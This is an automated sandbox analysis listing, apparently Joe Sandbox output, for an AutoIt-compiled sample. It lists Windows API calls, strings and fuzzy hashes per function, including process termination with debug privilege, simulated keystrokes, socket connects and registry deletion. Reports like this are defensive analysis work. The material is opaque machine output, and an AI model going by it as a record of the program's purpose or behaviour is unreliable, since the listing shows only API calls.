                                                                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                                                                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                                                                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                                                                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                                                                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                                                                                        Similarity
                                                                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2014098862-0
                                                                                        • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                                        • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                                                                                        • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                                                                        • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                                                                        • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                                                                        • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                                                                        • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                        • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                                                                        • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                                                                        • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                                                                        APIs
                                                                                          • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                                                                          • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                                                                          • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                                                                          • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                                                                        • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                                                                                        • _memset.LIBCMT ref: 00479813
                                                                                        • _memset.LIBCMT ref: 00479956
                                                                                        • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                                                                                        • CoTaskMemFree.OLE32(?), ref: 0047998D
                                                                                        Strings
                                                                                        • NULL Pointer assignment, xrefs: 004799DB
                                                                                        Similarity
                                                                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                        • String ID: NULL Pointer assignment
                                                                                        • API String ID: 1300414916-2785691316
                                                                                        • Opcode ID: dfb6947e6f265e4eeebdf8a304891f5c1fbd70c323f8dda92f53185c4893487f
                                                                                        • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                                                                                        • Opcode Fuzzy Hash: dfb6947e6f265e4eeebdf8a304891f5c1fbd70c323f8dda92f53185c4893487f
                                                                                        • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                                                                        • _wcscat.LIBCMT ref: 00486EAD
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                        • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                                                                        • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                                                                        • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                                                                        APIs
                                                                                          • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                                                                          • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                                                                          • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                                                                        • GetLastError.KERNEL32 ref: 0047E9B7
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                                                                        • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                        • String ID: SeDebugPrivilege
                                                                                        • API String ID: 2533919879-2896544425
                                                                                        APIs
                                                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: IconLoad
                                                                                        • String ID: blank$info$question$stop$warning
                                                                                        • API String ID: 2457776203-404129466
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                                                                        • LoadStringW.USER32(00000000), ref: 00464319
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                                                                        • LoadStringW.USER32(00000000), ref: 00464336
                                                                                        • _wprintf.LIBCMT ref: 0046435C
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                                                                        Strings
                                                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                                                        • API String ID: 3648134473-3128320259
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                                                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                                                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                                                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                                                                        • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                                                                        • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                                                                        Similarity
                                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                        • String ID:
                                                                                        • API String ID: 1211466189-0
                                                                                        APIs
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 00402ACF
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00402B17
                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C21A
                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0043C1C7,00000004,00000000,00000000,00000000), ref: 0043C286
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 004670DD
                                                                                          • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                                                                          • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00467114
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00467130
                                                                                        • _memmove.LIBCMT ref: 0046717E
                                                                                        • _memmove.LIBCMT ref: 0046719B
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004671AA
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 004671BF
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 004671DE
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 256516436-0
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                                        • GetDC.USER32(00000000), ref: 004861F3
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3864802216-0
                                                                                        APIs
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                        • _wcstok.LIBCMT ref: 0046EC94
                                                                                        • _wcscpy.LIBCMT ref: 0046ED23
                                                                                        • _memset.LIBCMT ref: 0046ED56
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X
                                                                                        • API String ID: 774024439-3081909835
                                                                                        APIs
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00476C00
                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00476C21
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00476C34
                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00476CEA
                                                                                        • inet_ntoa.WSOCK32(?), ref: 00476CA7
                                                                                          • Part of subcall function 0045A7E9: _strlen.LIBCMT ref: 0045A7F3
                                                                                          • Part of subcall function 0045A7E9: _memmove.LIBCMT ref: 0045A815
                                                                                        • _strlen.LIBCMT ref: 00476D44
                                                                                        • _memmove.LIBCMT ref: 00476DAD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                        • String ID:
                                                                                        • API String ID: 3619996494-0
                                                                                        • Opcode ID: f5e363b101de90cb534bcd6cd3fb256a8fb7d6fb98fcc976db2ccb98a7b2995e
                                                                                        • Instruction ID: ed0775ecea4f9d6c11d03e52ad69743ddbee2f845c96f8b55ead14f2c665c5c3
                                                                                        • Opcode Fuzzy Hash: f5e363b101de90cb534bcd6cd3fb256a8fb7d6fb98fcc976db2ccb98a7b2995e
                                                                                        • Instruction Fuzzy Hash: 3081E971204700AFC710EB25CC81EABB7A9EF84718F10892EF559A72D2DB78ED05CB59
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                        • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                                                        • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                        • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                                                        APIs
                                                                                        • IsWindow.USER32(00CD3038), ref: 0048B3EB
                                                                                        • IsWindowEnabled.USER32(00CD3038), ref: 0048B3F7
                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                                        • SendMessageW.USER32(00CD3038,000000B0,?,?), ref: 0048B512
                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                                        • GetWindowLongW.USER32(00CD3038,000000EC), ref: 0048B571
                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                        • String ID:
                                                                                        • API String ID: 4072528602-0
                                                                                        • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                        • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                                                        • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                        • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0047F448
                                                                                        • _memset.LIBCMT ref: 0047F511
                                                                                        • ShellExecuteExW.SHELL32(?), ref: 0047F556
                                                                                          • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                          • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                          • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                        • GetProcessId.KERNEL32(00000000), ref: 0047F5CD
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0047F5FC
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                        • String ID: @
                                                                                        • API String ID: 3522835683-2766056989
                                                                                        • Opcode ID: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                                                                        • Instruction ID: 5c1dd39b7f321ddcc7bcc10d078eb251a602d9f768a890d439a18523313ae713
                                                                                        • Opcode Fuzzy Hash: bc3d410e87ac89b06d51cd0e3322e6ce41cf3a0caf3fdd3db083c5eeea97c555
                                                                                        • Instruction Fuzzy Hash: 3B61B1B1A006189FCB04EF55C48099EB7F5FF48314F14846EE819BB392CB38AD45CB88
                                                                                        APIs
                                                                                        • GetParent.USER32(?), ref: 00460F8C
                                                                                        • GetKeyboardState.USER32(?), ref: 00460FA1
                                                                                        • SetKeyboardState.USER32(?), ref: 00461002
                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                        • Instruction ID: d8e1dc28bdc088eb6cbc7413f3b60f262c6bc769533ec748a7a92d83500406ea
                                                                                        • Opcode Fuzzy Hash: f9d591f81d686d4ab57c3a6e12a7387580c65fa7c1b8952d65f3ab419e893261
                                                                                        • Instruction Fuzzy Hash: 5F51D1A05046D53DFB3642348C15BBBBEA95B06304F0C898EE1D4959E3E2DDDCC8D75A
                                                                                        APIs
                                                                                        • GetParent.USER32(00000000), ref: 00460DA5
                                                                                        • GetKeyboardState.USER32(?), ref: 00460DBA
                                                                                        • SetKeyboardState.USER32(?), ref: 00460E1B
                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
                                                                                        Similarity
                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                        • String ID:
                                                                                        • API String ID: 87235514-0
                                                                                        • Opcode ID: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                        • Instruction ID: 69172e86244207f9b898dfa665998bef84c2b13c00b7e8d8db4e4b2c62b94f0a
                                                                                        • Opcode Fuzzy Hash: f49cedba9ac32d54de8a0d60295adc9efc4f295a5ca7e66696c334580efe5f7b
                                                                                        • Instruction Fuzzy Hash: 035136A05447D53DFB368334CC41B7B7FA95B06300F08898EE1D4569C2E39AAC88D35A
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                        • String ID:
                                                                                        • API String ID: 2945705084-0
                                                                                        • Opcode ID: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                        • Instruction ID: 7a6b7d837badcf90248cfae842bd011e2e93fbf2a36f5ea1b26b70f3dca78a8a
                                                                                        • Opcode Fuzzy Hash: 07e0947fe95a8180eaf0aa6e348e8d9897622cda980e67335bb2af8a3bf9752e
                                                                                        • Instruction Fuzzy Hash: 5541B565D1022476CB11EBB59846ACFB7B8AF05311F90485BF508E3221FA78E285C7AE
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
                                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                        • String ID: ,,I$DllGetClassObject
                                                                                        • API String ID: 753597075-1683996018
                                                                                        • Opcode ID: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                        • Instruction ID: 3f0141d9bf832a65cf1f2fff52dd88c9064c6a7eaa25d9247cf5eee920db5d90
                                                                                        • Opcode Fuzzy Hash: 33bd84876332b2fdda090ed26e6294b9c181052f8b99c0919512b630bc0f7b16
                                                                                        • Instruction Fuzzy Hash: 1B41A4B1900204EFDF24DF14C884A9A7BA9EF44315F1581AEEC09DF206D7B4DD49CBA8
                                                                                        APIs
                                                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                                                                          • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 004636B7
                                                                                        • _wcscmp.LIBCMT ref: 004636D3
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 004636EB
                                                                                        • _wcscat.LIBCMT ref: 00463733
                                                                                        • SHFileOperationW.SHELL32(?), ref: 0046379F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                        • String ID: \*.*
                                                                                        • API String ID: 1377345388-1173974218
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 004872AA
                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                                                        • IsMenu.USER32(?), ref: 00487369
                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                                                        • DrawMenuBar.USER32 ref: 004873C4
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 3866635326-4108050209
                                                                                        APIs
                                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                                                          • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                                                          • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                                                          • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                                                        Similarity
                                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                        • String ID:
                                                                                        • API String ID: 395352322-0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                                                        • GetWindowLongW.USER32(00CD3038,000000F0), ref: 0048631F
                                                                                        • GetWindowLongW.USER32(00CD3038,000000F0), ref: 00486354
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                                                        Similarity
                                                                                        • API ID: LongWindow$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 2178440468-0
                                                                                        APIs
                                                                                          • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                                        • WSAGetLastError.WSOCK32 ref: 00476221
                                                                                        • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                                        Similarity
                                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 910771015-0
                                                                                        APIs
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                        • API String ID: 1038674560-2734436370
                                                                                        APIs
                                                                                          • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
                                                                                          • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
                                                                                          • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00487632
                                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0048763F
                                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0048764A
                                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00487659
                                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00487665
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                                        • String ID: Msctls_Progress32
                                                                                        • API String ID: 1025951953-3636473452
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 0048B644
                                                                                        • _memset.LIBCMT ref: 0048B653
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                                                                                        • CloseHandle.KERNEL32 ref: 0048B694
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                                        • String ID: oL$doL
                                                                                        • API String ID: 3277943733-3421622115
                                                                                        • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                                        • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                                                                                        • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                                        • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                                                        • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                                                        • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 3489934621-2819208100
                                                                                        • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
